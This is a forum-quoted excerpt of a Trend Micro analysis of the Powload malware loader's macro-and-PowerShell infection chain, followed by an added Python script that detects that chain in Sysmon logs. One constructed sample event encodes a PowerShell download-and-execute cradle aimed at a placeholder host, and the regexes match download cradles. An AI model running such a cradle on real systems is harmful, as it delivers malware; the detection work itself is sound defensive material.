Powload Loads Up on Evasion Techniques (by Trend Micro)
<blockquote data-quote="silversurfer" data-source="post: 823761" data-attributes="member: 26718"><p><em>Posted on: July 9, 2019, <strong>by Ian Mercado and Josefino Fajilago, </strong>Author:</em><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/author/trend-micro/" target="_blank"><em> Trend Micro</em></a></p><p>Powload gained notoriety <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">as a catalyst for other malware</a>, a prominent example being Emotet, a banking trojan known for its modular capabilities. Powload has since remained a cybercrime staple due to its ability to combine simple infection methods with constantly evolving features — <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">including capabilities intended for evading security technology</a>.</p><p>By sifting through six months’ worth of data (Jan-Jun 2019) covering over 50,000 samples from the Trend Micro™ Smart Protection Network™ infrastructure, we managed to gain insight into how Powload has incorporated new techniques to increase its effectiveness, especially in its ability to hide from detection. Here’s what we’ve learned.</p><p><span style="font-size: 15px"><strong>Powload in the wild</strong></span></p><p>A typical Powload attack uses social engineering techniques to get the user to click on an email attachment — for example, <a href="https://www.trendmicro.com/vinfo/kr/threat-encyclopedia/spam/3673/passwordprotected-zipped-file-spammed-to-deliver-powload-and-emotet" target="_blank">disguising the email as an invoice document</a> supposedly from a supplier. The Powload samples we’ve observed often use attachments that contain a macro coded with Visual Basic for Attachments (VBA), which, when clicked, activates a hidden PowerShell process to download and execute the malware payload. Most Powload variants will often <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/from-fileless-techniques-to-using-steganography-examining-powloads-evolution/" target="_blank">incorporate obfuscation techniques</a> to avoid hash-based detections.</p><p>While PowerShell scripts remain the most common method for downloading and executing the malware, the methods for tricking users into clicking the attachments and for hiding traces of the malware from security software are not always the same. We observed some basic techniques that range from using macro-enabled documents as social engineering lures to using hacking tools for obfuscation.</p><p>Continue reading below:</p><p>[URL unfurl="true"]https://blog.trendmicro.com/trendlabs-security-intelligence/powload-loads-up-on-evasion-techniques/[/URL]</p></blockquote>
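The post notes that obfuscation defeats hash-based detection, which is why the Office-macro-to-hidden-PowerShell chain it describes is usually caught on behaviour instead. The following is an added example (not code from the post or from Trend Micro's article) that scores Sysmon-style process-creation records (fields ParentImage, Image, CommandLine are assumed) for exactly that chain, decoding a -EncodedCommand argument so download cradles hidden inside it are still matched; the sample records are constructed.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Behavioural markers of the chain described above: hidden window, encoded
# (obfuscated) command line, download cradle, in-memory execution.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": ENCODED_ARG,
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def decode_encoded(cmd: str) -> str:
    """Plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_ARG.search(cmd)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace") if m else ""
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def analyse_event(event: dict) -> dict:
    """Score one process-creation record; an Office parent spawning PowerShell weighs most."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    text = cmd + "\n" + decode_encoded(cmd)  # also match inside the decoded payload
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    office_spawn = parent in OFFICE_PARENTS and image in POWERSHELL
    score = (2 if office_spawn else 0) + len(hits)
    return {"office_spawn": office_spawn, "indicators": hits, "score": score, "alert": score >= 2}

def find_alerts(events: list) -> list:
    """(index, analysis) for every record that crosses the alert threshold."""
    return [(i, r) for i, r in enumerate(map(analyse_event, events)) if r["alert"]]
def _enc(ps: str) -> str:  # encode the way powershell.exe -EncodedCommand expects
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed Sysmon Event ID 1 style records, not real telemetry; the URL is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
]
```

Run over the sample, only the first record alerts (Office parent plus all four indicators); the admin-launched script from explorer.exe scores zero.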